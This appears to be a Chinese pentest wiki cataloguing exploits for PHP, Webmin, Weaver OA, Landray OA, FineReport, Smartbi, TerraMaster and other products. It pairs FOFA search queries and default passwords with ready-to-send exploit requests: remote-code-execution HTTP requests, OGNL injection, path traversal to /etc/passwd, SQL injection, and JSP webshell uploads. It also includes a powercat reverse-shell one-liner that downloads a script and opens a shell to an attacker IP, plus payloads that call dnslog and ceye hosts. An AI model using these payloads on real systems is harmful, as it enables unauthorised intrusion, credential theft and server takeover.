5.3.12 之前和 5.4.2 之前的 5.4.x 中的 sapi/cgi/cgi_main.c 在配置为 CGI 脚本(aka php-cgi)时，不能正确处理缺少=(等号)字符的查询字符串，它允许远程攻击者通过在查询字符串中放置命令行选项来执行任意代码，这与在"d"情况下缺少跳过某些 php_getopt 有关。
影响版本
- php < 5.3.12
- php < 5.4.2
相关文章
- PHP-CGI远程代码执行漏洞 (CVE-2012-1823) 分析

POC | Payload | exp

来源: https://vulhub.org/#/environments/php/CVE-2012-1823/

http://你的 IP 地址:端口号/index.php?-s 即爆出源码

发送如下数据包,可见 Body 中的代码已被执行:

POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: example.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

<?php echo shell_exec("id"); ?>

MSF Module

use exploit/multi/http/php_cgi_arg_injection

CVE-2018-19518 PHP imap 远程命令执行漏洞

描述
php imap 扩展用于在 PHP 中执行邮件收发操作.其 imap_open 函数会调用 rsh 来连接远程 shell,而 debian/ubuntu 中默认使用 ssh 来代替 rsh 的功能 (也就是说,在 debian 系列系统中,执行 rsh 命令实际执行的是 ssh 命令) .
因为 ssh 命令中可以通过设置 -oProxyCommand= 来调用第三方命令,攻击者通过注入注入这个参数,最终将导致命令执行漏洞.
影响版本
- php 5.6.0 ~ 5.6.38
- php 7.0.0 ~ 7.0.32
- php 7.1.0 ~ 7.1.24
- php 7.2.0 ~ 7.2.12
POC | Payload | exp
- PHP imap 远程命令执行漏洞 (CVE-2018-19518)

LFI with phpinfo

描述
PHP 文件包含漏洞中,如果找不到可以包含的文件,我们可以通过包含临时文件的方法来 getshell.因为临时文件名是随机的,如果目标网站上存在 phpinfo,则可以通过 phpinfo 来获取临时文件名,进而进行包含.
POC | Payload | exp
- PHP文件包含漏洞 (利用phpinfo)
- LFI with phpinfo

PHP 环境 XML 外部实体注入漏洞 (XXE)

描述
libxml2.9.0 以后,默认不解析外部实体.
POC | Payload | exp
- PHP环境 XML外部实体注入漏洞 (XXE)

XDebug 远程调试漏洞 (代码执行)

描述
XDebug 是 PHP 的一个扩展,用于调试 PHP 代码.如果目标开启了远程调试模式,并设置 remote_connect_back = 1:
```
xdebug.remote_connect_back = 1
xdebug.remote_enable = 1
```
这个配置下,我们访问 http://target/index.php?XDEBUG_SESSION_START=phpstorm ,目标服务器的 XDebug 将会连接访问者的 IP (或 X-Forwarded-For 头指定的地址) 并通过 dbgp 协议与其通信,我们通过 dbgp 中提供的 eval 方法即可在目标服务器上执行任意 PHP 代码.
相关文章
- 浅析常见Debug调试器的安全隐患
POC | Payload | exp
- XDebug 远程调试漏洞 (代码执行)

PHP-FPM

PHP-FPM 是一个 PHPFastCGI 管理器，对于 PHP 5.3.3 之前的 php 来说，是一个补丁包，旨在将 FastCGI 进程管理整合进 PHP 包中。

PHP-FPM Fastcgi 未授权访问漏洞

CVE-2019-11043 PHP-FPM 远程代码执行漏洞

描述
在长亭科技举办的 Real World CTF 中,安全研究员 Andrew Danau 在解决一道 CTF 题目时发现,向目标服务器 URL 发送 %0a 符号时,服务返回异常,疑似存在漏洞.
在使用一些有错误的 Nginx 配置的情况下,通过恶意构造的数据包,即可让 PHP-FPM 执行任意代码.
影响版本
- php 7.1.0 ~ 7.1.33
- php 7.2.0 ~ 7.2.24
- php 7.3.0 ~ 7.3.11
相关文章
- CVE-2019-11043PHP-FPM在Nginx特定配置下远程代码执行漏洞复现
POC | Payload | exp
- PHP-FPM 远程代码执行漏洞 (CVE-2019-11043)
- neex/phuip-fpizdam

PHPUnit

CVE-2017-9841 eval-stdin.php 远程命令执行漏洞

相关文章
- PHPUnit: A Security Risk?

POC | Payload | exp

curl --data "<?php print str_rot13('V pna erzbgryl rkrphgr CUC pbqr ba lbhe freire');" http://localhost:8080/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

PHPMailer

CVE-2017-5223 任意文件读取漏洞

相关文章
- PHPMailer 任意文件读取漏洞

Portainer

fofa: app="portainer"

相关文章

Docker管理工具Portainer中的多个漏洞

Prometheus

fofa: app="Prometheus-Time-Series-Collection-and-Processing-Server"

相关文章

Prometheus API大规模暴露在互联网上|包括敏感信息

rConfig

fofa: app="rConfig"

rConfig 3.9.6 rce

相关文章
- rConfig 3.9.6 - Magic Hash Auth Bypass to RCE

ResourceSpace

fofa: app="ResourceSpace"

CVE-2015-3648

POC | Payload | exp

/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

CVE-2021-41765

影响版本
- ResourceSpace <= 9.5
相关文章
- ResourceSpace未授权SQL注入到RCE利用链(CVE-2021-41765)

CVE-2021-41950

相关文章
- ResourceSpace目录穿越到任意文件删除利用链(CVE-2021-41950)

CVE-2021-41951

影响版本
- ResourceSpace <= 9.5
相关文章
- ResourceSpace反射型XSS(CVE-2021-41951)

SaltStack

fofa: app="SALTSTACK-产品"

CVE-2020-11651 SaltStack认证绕过

默认端口

4505  publish_port      提供远程执行命令发送功能
4506  ret_port          支持认证、文件服务、结果收集等功能
8000  salt‐api

相关文章
- CVE-2020-11651 SaltStack认证绕过分析
POC | Payload | exp

CVE-2020-16846/25592

相关文章
- SaltStack未授权访问及命令执行漏洞分析(CVE-2020-16846/25592)

CVE-2021-25281/25282/25283

相关文章
- SaltStack远程执行代码多个高危漏洞透析(CVE-2021-25281/25282/25283)

SAP

fofa: app="SAP-Web-Application-Server"

相关资源

lazaars/SAP-Pentest

CVE-2018-2380 SAP NetWeaver AS JAVA CRM Remote Command Execution via Log injection

POC | Payload | exp
- erpscanteam/CVE-2018-2380

CVE-2020-6207 SAP Solution Manager RCE

POC | Payload | exp
- chipik/SAP_EEM_CVE-2020-6207

CVE-2020-6287

POC | Payload | exp
- chipik/SAP_RECON
- duc-nt/CVE-2020-6287-exploit

CVE-2020-6308

描述
SAP BusinessObjects Business Intelligence平台(Web服务)版本-410、420、430允许未经身份验证的攻击者注入任意值作为CMS参数，以在内部网络上执行查找，否则将无法从外部访问该内部网络

POC | Payload | exp

https://github.com/InitRoot/CVE-2020-6308-PoC

/AdminTools/querybuilder/logon?framework=

aps=xxx.dnslog.cn&usr=admin&pwd=admin&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp

Sentinel

项目地址: https://github.com/alibaba/Sentinel

sentinel-dashboard ssrf

相关文章
- 阿里巴巴Sentinel开源组件SSRF漏洞分析

POC | Payload | exp

Report a Sentinel Security Vulnerability about SSRF #2451

curl -XGET 'http://127.0.0.1:8080/registry/machine?app=SSRF-TEST&appType=0&version=0&hostname=TEST&ip=localhost:12345%23&port=0'

SharePoint

CVE-2022-29108

相关文章
- CVE-2022-29108&CVE-2022-22005 SharePoint远程命令执行漏洞分析与复现

ShenYu

fofa: body="id="httpPath"" && body="th:text="${domain}""

CVE-2021-37580 Apache ShenYu Admin 身份验证绕过漏洞

相关文章
影响范围
- Apache ShenYu 2.3.0
- Apache ShenYu 2.4.0
POC | Payload | exp
```
/dashboardUser
```
- Liang2580/CVE-2021-37580/

CVE-2021-45029 Apache ShenYu Groovy&SpEL表达式注入漏洞

相关文章
- CVE-2021-45029 Apache ShenYu Groovy&SpEL表达式注入漏洞分析与复现

ShowDoc

fofa: app="ShowDoc"

ShowDoc 前台任意文件上传

相关文章
- ShowDoc 前台任意文件上传

SkyWalking

fofa: app="APACHE-Skywalking"

Apache Skywalking <=8.3 SQL注入

相关文章
- Apache Skywalking <=8.3 SQL注入分析复现
- Skywalking远程代码执行漏洞分析

Smartbi

fofa: app="SMARTBI"

常见口令

demo/demo
manager/demo
admin/admin
admin/manager
admin/2manager

相关文章

Tips

http://127.0.0.1:18080/smartbi/vision/config.jsp 可能未修改密码或者密码为 manager

任意文件读取

POC | Payload | exp

/vision/FileServlet?ftpType=out&path=upload/../../../../../../../../../../etc/passwd&name=%E4%B8%AD%E5%9B%BD%E7%9F%B3%E6%B2%B9%E5%90%89%E6%9E%97%E7%99%BD%E5%9F%8E%E9%94%80%E5%94%AE%E5%88%86%E5%85%AC%E5%8F%B8XX%E5%8A%A0%E6%B2%B9%E7%AB%99%E9%98%B2%E9%9B%B7%E5%AE%89%E5%85%A8%E5%BA%94%E6%80%A5%E9%A2%84%E6%A1%88.docx

wsdl泄露

POC | Payload | exp

/vision/services/CatalogService?wsdl
SimpleReportService 提供灵活报表相关操作功能 https://127.0.0.1/vision/services/SimpleReportService?wsdl
BusinessViewService 提供数据集定义相关操作功能 https://127.0.0.1/vision/services/BusinessViewService?wsdl
DataSourceService 提供数据源相关操作功能 https://127.0.0.1/vision/services/DataSourceService?wsdl
AnalysisReportService 提供多维分析相关操作功能 https://127.0.0.1/vision/services/AnalysisReportService?wsdl
UserManagerService 提供用户相关操作，包括：读取/维护用户信息、读取/维护组信息、读取/维护角色信息、为用户和组分配角色等 https://127.0.0.1/vision/services/UserManagerService?wsdl

后台目录遍历

POC | Payload | exp

/vision/chooser.jsp?key=CONFIG_FILE_DIR&root=C%3A%2F

/vision/monitor/sysprops.jsp
/vision/monitor/getclassurl.jsp?classname=smartbi.freequery.expression.ast.TextNode
/vision/monitor/hardwareinfo.jsp

后台 session 窃取

POC | Payload | exps

/vision/monitor/listsessions.jsp        # 查看session

后台内存 dump

POC | Payload | exp

/vision/monitor/heapdump.jsp            # 缓存抓取密码,使用Eclipse Memory Analyzer解析内存文件
/vision/monitor/heapdump.jsp?dumpbin=true

后台SSRF

POC | Payload | exp
```
/vision/monitor/testmailserver.jsp
```

SolarWinds

CVE-2020-10148

影响版本
SolarWinds Orion 2020.2.1 HF 2 及 2019.4 HF 6之前的版本
相关文章
- SolarWinds Orion漏洞分析之一： CVE-2020-10148从认证绕过到命令执行

CVE-2021-35215

相关文章
- SolarWinds Orion漏洞分析之二：CVE-2021-35215 Json反序列化漏洞

SonarQube

fofa: app="sonarQube-代码管理"

管理员密码默认为admin/admin

相关文章

【新手入门系列】CVE-2020-*-系统梳理SonarQube API信息泄露漏洞

CVE-2020-27986

相关文章
- Atw组织攻击分析及cve 2020 27986进阶利用

POC | Payload | exp

/api/settings/values        泄露SMTP、SVN和Gitlab密码。

/api/webservices/list       泄露接口信息

Supervisord

项目地址 : https://github.com/Supervisor/supervisor

搭建教程

Supervisord 搭建

测试链接

http://[ip]:9001

CVE-2017-11610 Supervisord 远程命令执行漏洞

描述
supervisor 中的 XML-RPC 服务器允许远程身份验证的用户通过精心编制的与嵌套 supervisord 命名空间查找相关的 XML-RPC 请求执行任意命令。
影响版本
- supervisor < 3.0
- supervisor 3.1.0 ~ 3.3.2
相关文章
- Supervisord远程命令执行漏洞 (CVE-2017-11610)
- Supervisord 远程命令执行漏洞 (CVE-2017-11610)

TerraMaster-TOS

相关文章

TerraMaster TOS 多个漏洞复现

CVE-2020-15568 exportUser.php 远程命令执行

POC | Payload | exp

http://xxx.xxx.xxx.xxx/include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)>1.txt
http://xxx.xxx.xxx.xxx/include/1.txt

CVE-2020-28185 用户枚举漏洞

POC | Payload | exp
- http://wiki.peiqi.tech/PeiQi_Wiki/Web应用漏洞/TerraMaster/TerraMaster TOS 用户枚举漏洞 CVE-2020-28185.html

CVE-2020-28186 任意账号密码修改漏洞

POC | Payload | exp
- http://wiki.peiqi.tech/PeiQi_Wiki/Web应用漏洞/TerraMaster/TerraMaster TOS 任意账号密码修改漏洞 CVE-2020-28186.html

CVE-2020-28187 后台任意文件读取漏洞

POC | Payload | exp

/tos/index.php?editor/fileGet&filename=../../../../../../etc/passwd

CVE-2020-28188 upload

POC | Payload | exp
- http://wiki.peiqi.tech/PeiQi_Wiki/Web应用漏洞/TerraMaster/TerraMaster TOS RCE CVE-2020-28188.html

CVE-2022-24990 createRaid 远程命令执行

相关文章
- TerraMaster TOS createRaid 远程命令执行 CVE-2022-24990

trojan多用户管理部署程序

https://github.com/Jrohy/trojan

相关文章

trojan多用户管理部署程序审计学习

命令注入漏洞

POC | Payload | exp
- https://github.com/Jrohy/trojan/issues/704

默认 jwt 密钥

POC | Payload | exp
- https://github.com/Jrohy/trojan/issues/703

TRS_WAS

Fofa: body="/was5/"

TRS(拓尔思)WCM任意文件上传漏洞

描述
file_upload.html 未做访问限制，攻击者可以匿名访问上传页面进行文件上传操作。
影响版本
- WCM5.2
- WCM6.1

POC | Payload | exp

xxx.com/file/file_upload.html、infogate/file/file_upload.html

TRS(拓尔思)WAS 4.5 SQL注入漏洞

描述
rss.jsp 页面 "channelid" 参数未进行过滤
影响版本
- WAS 4.5

POC | Payload | exp

/wcm/help/wcmhelp_list.jsp?trandom=0.3575719151171357&JspUrl=http://xxx/wcm/#/loginpage.jsp' and (select top 1 username+char(124)+password from wcmuser)>0--

CNVD-2020-27769 拓尔思TRSWAS_5.0任意文件读取

描述
该漏洞成因为 web/tree 接口 treefile 参数存在文件读取漏洞，可读取数据库配置文件、账户密码等信息，导致配置文件信息泄露威胁网站安全。
影响版本
- TRSWAS_5.0

POC | Payload | exp

http://xxx.com/was5/web/tree?treefile=/WEB-INF/classes/com/trs/was/resource/wasconfig.properties

Unomi

Fofa: title="Unomi"

CVE-2020-13942 rce

POC | Payload | exp

POST /context.json HTTP/1.1
Host: x.x.x.x
Connection: close
Pragma: no-cache
Cache-Control: no-cache
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://x.x.x.x/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 491

{
    "filters": [
        {
            "id": "sample",
            "filters": [
                {
                    "condition": {
                        "parameterValues": {
                            "": "script::Runtime r = Runtime.getRuntime(); r.exec('ping 1.dnslog.cn');"
                        },
                        "type": "profilePropertyCondition"
                    }
                }
            ]
        }
    ],
    "sessionId": "sample"
}

Webmin

官网 : http://www.webmin.com/

搭建教程

Webmin 搭建

CVE-2019-12840

POC | Payload | exp
- KrE80r/webmin_cve-2019-12840_poc

CVE-2019-15107 Webmin Remote Code Execution

描述
在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令.
影响版本
- Webmin < 1.920
相关文章
- Webmin(CVE-2019-15107) 远程代码执行漏洞之 backdoor 探究

POC | Payload | exp

vulhub/webmin/CVE-2019-15107/README.zh-cn.md

POST /password_change.cgi HTTP/1.1
Host: your-ip:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://your-ip:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60

user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2

CVE-2019-15642 Webmin Remote Code Execution

描述
Webmin 到 1.920 中的 rpc.cgi 允许通过精心设计的对象名称进行经过身份验证的远程代码执行，因为 unserialise_variable 进行了 eval 调用。注意：Webmin_Servers_Index 文档指出“ RPC 可用于运行任何命令或修改服务器上的任何文件，这就是为什么不得将它的访问权限授予不可信的 Webmin 用户的原因。”
影响版本
- Webmin < 1.920
POC | Payload | exp
- jas502n/CVE-2019-15642

CVE-2020-35606

POC | Payload | exp

/package-updates/update.cgi

application/x-www-form-urlencoded

redir=%2E%2E%2Fsquid%2F&redirdesc=Squid%20Proxy%20Server&mode=new&u=squid34%0A%7C#{payload}%26%26

XXL-job

fofa: app="XXL-JOB"

RESTful API 未授权访问RCE

相关文章
- XXL-job 执行器 RESTful API 未授权访问RCE
POC | Payload | exp
- OneSourceCat/XxlJob-Hessian-RCE
- jas502n/xxl-job

zabbix

官网 : https://www.zabbix.com
fofa: app="ZABBIX-监控系统"

zabbix 是一款服务器监控软件,其由 server、agent、web 等模块组成,其中 web 模块由 PHP 编写,用来显示数据库中的结果.

搭建教程

zabbix 搭建

CVE-2016-10134 zabbix latest.php SQL 注入漏洞

描述
Zabbix 的 latest.php 中的 toggle_ids[] 或 jsrpc.php 中的 profieldx2 参数存在 sql 注入，通过 sql 注入获取管理员账户密码，进入后台，进行 getshell 操作。
影响版本
- zabbix < 2.2.13
- zabbix 3.0.0 ~ 3.0.3
相关文章

CVE-2020-11800 zabbix RCE

描述
Zabbix Server 的 trapper 命令处理，存在命令注入漏洞，可导致远程代码执行。
相关文章

CVE-2021-27927

相关文章
- CVE-2021-27927: Zabbix-CSRF-to-RCE

CVE-2022-23131

相关文章
- CVE-2022-23131 Zabbix SAML SSO认证绕过漏洞分析与复现
POC | Payload | exp
- Mr-xn/cve-2022-23131

CVE-2022-23134

相关文章
- CVE-2022-23134 Zabbix漏洞分析之二：从未授权访问到接管后台

Zimbra

相关文章

zimbra RCE 漏洞利用

Zoho-ManageEngine

CVE-2020-28653

相关文章
- CVE-2020-28653-如何绕过反序列化漏洞补丁-Zoho ManageEngine OpManager

任意文件上传

相关文章
- Zoho ManageEngine Admanager Plus 任意文件上传漏洞可GetShell

CVE-2021-40539

相关文章
- CVE-2021-40539-Zoho ManageEngine ADSelfService Plus如何从bypass到RCE

CVE-2021-41081

相关文章
- CVE-2021-41081-通过逆向推理快速分析Zoho ManageEngine NCM SQL注入漏洞

CVE-2021-44077

相关文章
- CVE-2021-44077 Zoho ManageEngine ServiceDesk Plus RCE漏洞

CVE-2021-44515

相关文章
- CVE-2021-44515 Zoho ManageEngine Desktop Central Pre-auth RCE
- 认证绕过新姿势之Zoho ManageEngine Desktop Central CVE-2021-44515

CVE-2022-28219

相关文章
- CVE-2022-28219 Zoho 远程命令执行漏洞-组合Java XXE、反序列化和路径穿越漏洞实现匿名RCE

CVE-2022-29081

相关文章
- CVE-2022-29081 Zoho卓豪会话管理系统存在认证绕过漏洞

宝塔

fofa: app="宝塔-Linux控制面板"

相关资源

Hzllaga/BT_Panel_Privilege_Escalation - 宝塔面板Windows版提权方法

宝塔面板 phpMyadmin 未授权访问

POC | Payload | exp
```
xxx.xxx.xxx.xxx:888/pma
```

宝塔 <6.0 存储形xss

相关文章
- 宝塔linux面板 <6.0 存储形xss

禅道

fofa: app="易软天创-禅道系统"

CNVD-2020-65242 后台任意文件下载

POC | Payload | exp

index.php?m=file&f=sendDownHeader&fileName=2&fileType=1&content=/etc/passwd&type=file
index.php?m=file&f=sendDownHeader&fileName=2&fileType=1&content=./../../config/my.php&type=file

后台 im 模块 downloadXxdPackage 函数任意文件下载

POC | Payload | exp

index.php?m=im&f=downloadXxdPackage&xxdFileName=../../../../../../../../../etc/passwd

12.4.2后台管理员权限Getshell

相关文章
- 禅道12.4.2后台管理员权限Getshell复现

帆软

fofa: app="帆软-FineReport"
fofa: body="/WebReport/ReportServer"
fofa: body="isSupportForgetPwd"

帆软报表目录遍历

POC | Payload | exp

/WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml

CNVD-2018-04757 帆软报表 v8.0 任意文件读取漏洞

相关文章
- 帆软报表v8.0 Getshell漏洞分析
- 帆软报表 v8.0 任意文件读取漏洞 CNVD-2018-04757

帆软 V9 任意文件覆盖getshell

相关文章
- 帆软 V9 getshell

POC | Payload | exp

POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update.jsp  HTTP/1.1
Host: 192.168.10.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=DE7874FC92F0852C84D38935247D947F; JSESSIONID=A240C26B17628D871BB74B7601482FDE
Connection: close
Content-Type:text/xml;charset=UTF-8

Content-Length: 74

{"__CONTENT__":"<%out.println(\"Hello World!\");%>","__CHARSET__":"UTF-8"}

帆软报表 FineRePort 未授权远程命令执行漏洞

影响版本
- 帆软报表 FineRePortv8.0
- 帆软报表 FineRePortv9.0

POC | Payload | exp

xxx.com/WebReport/ReportServer?op=fr_log&cmd=fg_errinfo&fr_username=admin

这个接口 打开 点查询 burp 拦截数据包 替换 post 的内容

__parameters__={"LABEL1":"TYPE:","TYPE":"6;CREATE ALIAS RUMCMD FOR \"com.fr.chart.phantom.system.SystemServiceUtils.exeCmd\";CALL RUMCMD('curl http://xxxx.ceye.io');select msg, trace, sinfo, logtime from fr_errrecord where 1=1","LABEL3":"START_TIME:","START_TIME":"2020-08-11 00:00","LABEL5":"END_TIME:","END_TIME":"2020-08-11 16:41","LABEL7":"LIMIT:","LIMIT":2}

POST /WebReport/ReportServer?op=fr_log&cmd=fg_errinfo&fr_username=admin HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Connection: close
Content-Length: 675

__parameters__={"LABEL1":"TYPE:","TYPE":"6;CREATE ALIAS RUMCMD FOR \"com.fr.chart.phantom.system.SystemServiceUtils.exeCmd\";CALL RUMCMD('curl http://xxxx.dnslog.cn');select msg, trace, sinfo, logtime from fr_errrecord where 1=1","LABEL3":"START_TIME:","START_TIME":"2020-08-11 00:00","LABEL5":"END_TIME:","END_TIME":"2020-08-11 16:41","LABEL7":"LIMIT:","LIMIT":2}

OA

本类包含 OA、ERP、CRM 等

蓝凌

FOFA: app="Landray-OA系统"

相关工具

yuanhaiGreg/LandrayExploit

蓝凌OA custom.jsp 任意文件读取漏洞

相关文章
- 蓝凌OA custom.jsp 任意文件读取漏洞

POC | Payload | exp

POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 42
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

var={"body":{"file":"file:///etc/passwd"}}

蓝凌 OA SSRF+JNDI 远程命令执行

POC | Payload | exp

配合文件读漏洞 读取 /WEB-INF/KmssConfig/admin.properties
获取password后，使用 DES方法 解密，默认密钥为 kmssAdminKey

访问后台地址使用解密的密码登录
http://xxx.xxx.xxx.xxx/admin.do

使用JNDI-Injection-Exploit 执行 getshell

CNVD-2021-01363-蓝凌 OA-EKP 后台 SQL 注入漏洞

描述
ordeby 参数存在注入

POC | Payload | exp

/km/imeeting/km_imeeting_res/kmImeetingRes.do?contentType=json&method=listUse&orderby=1&ordertype=down&s_ajax=true

蓝凌 OA xmldecoder 反序列化

相关文章
- 蓝某OA前台SSRF进一步利用到RCE
- 记一次密码读取+SSRF渗透测试

POC | Payload | exp

/sys/search/sys_search_main/sysSearchMain.do?method=editParam&fdParemNames=11&FdParameters=[shellcode]

蓝凌 OA treexml.tmpl script 远程代码执行漏洞

POC | Payload | exp
- tangxiaofeng7/Landray-OA-Treexml-Rce

泛微

官网 : https://www.weaver.com.cn/

相关文章

相关工具

z1un/weaver_exp

敏感文件泄露

/messager/users.data
/plugin/ewe/jsp/config.jsp

路径遍历

/plugin/ewe/admin/upload.jsp?id=11&dir=../../../
/weaver/weaver.file.SignatureDownLoad?markId=1+union+select+'../ecology/WEB-INF/prop/weaver.properties'

e-mobile

fofa: app="泛微-EMobile"

E-mobile

admin/admin111

E-Mobile 4.5 RCE

**.**.**.**/verifyLogin.do
data：loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${@**.**.**.**.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('ipconfig').getInputStream())}

http://**.**.**.**/verifyLogin.do
data:  loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${6666-2333}
http://**.**.**.**:89/verifyLogin.do
data:  loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${6666-2333}
**.**.**.**/verifyLogin.do
data:  loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${6666-2333}
http://**.**.**.**/verifyLogin.do
data:  loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${6666-2333}
http://**.**.**.**/verifyLogin.do
data:  loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${6666-2333}

CNVD-2017-03561 e-mobile < 6.5 Ognl 表达式注入

影响版本
- v6.5
- v5.5
相关文章

POC | Payload | exp

/login.do?message=${}
/manager/login.do?message=${}

message=(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#w=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(#parameters.cmd[0]).getInputStream()))).(#w.close())&cmd=whoami

CNVD-2017-07285 S2-046

POC | Payload | exp

filename="%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"

CNVD-2021-25287 SQLi to RCE

影响版本
- v6.6
相关文章
- 泛微e-mobile6.6前台RCE漏洞分析与复现

POC | Payload | exp

https://github.com/YinWC/2021hvv_vul/blob/master/0410/泛微e-mobile 0day.md

/messageType.do
/client.do

CREATE ALIAS EXEC AS
$$ void e(String cmd) throws java.io.IOException
{java.lang.Runtime rt= java.lang.Runtime.getRuntime();rt.exec(cmd);}$$
CALL EXEC('whoami');

e-cology

fofa: app="Weaver-OA"
fofa: app="泛微-协同办公 OA"

指纹

Set-Cookie: ecology_JSessionId=
ecology

OA 默认口令

sysadmin/1

/services/MobileService?wsdl 注入

相关文章
- 泛微e-cology7.1 SOAP注入引发的血案
- 泛微协同商务系统e-cology某处SQL注入

泛微OA sysinterface/codeEdit.jsp 页面任意文件上传 WooYun-2015-0155705

相关文章
- 泛微OA sysinterface/codeEdit.jsp 页面任意文件上传 WooYun-2015-0155705
POC | Payload | exp
```
/sysinterface/codeEdit.jsp
```

e-cology OA Beanshell 组件远程代码执行

相关文章
- [漏洞预警]泛微e-cology OA Beanshell组件远程代码执行分析
- 泛微e-cology OA Beanshell组件远程代码执行漏洞复现

POC | Payload | exp

jas502n/e-cology

/weaver/bsh.servlet.BshServlet

eval%00("ex"%2b"ec(\"whoami\")"); 也可以换成 ex\u0065c("cmd /c dir");

泛微多数都是 windows 环境, 反弹 shell 可以使用 pcat

powershell IEX(New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ip -p 6666 -e cmd

ecology8_mobile_sql_inject

POC | Payload | exp
- ecology8_mobile_sql_inject

泛微 OA WorkflowCenterTreeData 接口注入漏洞(限 oracle 数据库)

POC | Payload | exp
- AdministratorGithub/e-cology-OA-SQL

泛微 ecology OA 系统接口存在数据库配置信息泄露漏洞

相关文章
- 泛微ecology OA数据库配置信息泄露漏洞复现
POC | Payload | exp
- jas502n/DBconfigReader
- NS-Sp4ce/Weaver-OA-E-cology-Database-Leak

泛微OA V8 SQL注入漏洞

描述
泛微 OA V8 存在 SQL 注入漏洞，攻击者可以通过漏洞获取管理员权限和服务器权限

POC | Payload | exp

/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager

泛微OA V9前台上传漏洞

描述
泛微 OA V9 存在文件上传接口导致任意文件上传, 漏洞位于: /page/exportImport/uploadOperation.jsp 文件中

POC | Payload | exp

POST /page/exportImport/uploadOperation.jsp HTTP/1.1
Host: x.x.x.x
Content-Length: 216
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x/
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFy3iNVBftjP6IOwo
Connection: close

------WebKitFormBoundaryFy3iNVBftjP6IOwo
Content-Disposition: form-data; name="file"; filename="12.jsp"
Content-Type: application/octet-stream

<%out.print(1111);%>
------WebKitFormBoundaryFy3iNVBftjP6IOwo--

page/exportImport/fileTransfer/12.jsp

泛微OA V9 E-Cology WorkflowServiceXml RCE

描述
泛微 E-cology OA 系统的 WorkflowServiceXml 接口可被未授权访问，攻击者调用该接口，可构造特定的 HTTP 请求绕过泛微本身一些安全限制从而达成远程代码执行
相关文章

泛微OA weaver.common.Ctrl 任意文件上传漏洞

描述
